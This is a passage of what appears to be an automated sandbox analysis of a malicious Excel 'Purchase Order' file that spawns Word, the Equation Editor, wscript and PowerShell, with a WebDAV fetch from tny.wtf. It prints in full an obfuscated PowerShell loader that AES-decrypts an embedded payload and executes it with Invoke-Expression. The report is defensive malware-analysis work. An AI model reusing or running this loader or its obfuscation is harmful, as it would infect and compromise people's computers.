[System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0059A842 push ds; retf 8_2_0059A9B4
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005965EC pushad ; ret 8_2_005965ED
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_007449C7 push eax; retf 10_2_00744A82
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_007421C3 push ebx; iretd 10_2_007421EA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00810AC8 pushad ; ret 10_2_00810AC9

    Persistence and Installation Behavior

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
    Source: Office documentLLM: Score: 9 Reasons: The screenshot prominently displays a message with the Microsoft Office logo and the text 'This document is protected'. This is a common tactic used in phishing attacks to create a sense of urgency and prompt the user to click on a link or button to 'unlock' or 'view' the document. The use of the Microsoft Office logo is an attempt to impersonate a well-known brand, which can mislead users into believing the document is legitimate. The combination of the prominent logo, the text indicating the document is protected, and the potential for a hidden link or button to 'view' the document creates a high risk of phishing.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].doc.0.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: FC991353.doc.4.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Purchase Order.xlsStream path 'MBD000C7DEA/Package' entropy: 7.98062920569 (max. 8.0)
    Source: Purchase Order.xlsStream path 'Workbook' entropy: 7.99943372983 (max. 8.0)
    Source: ~DF5E0D49EEB1332A8C.TMP.0.drStream path 'Package' entropy: 7.97762979663 (max. 8.0)
    Source: 4E630000.0.drStream path 'MBD000C7DEA/Package' entropy: 7.97762979663 (max. 8.0)
    Source: 4E630000.0.drStream path 'Workbook' entropy: 7.99954921044 (max. 8.0)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 635Jump to behavior
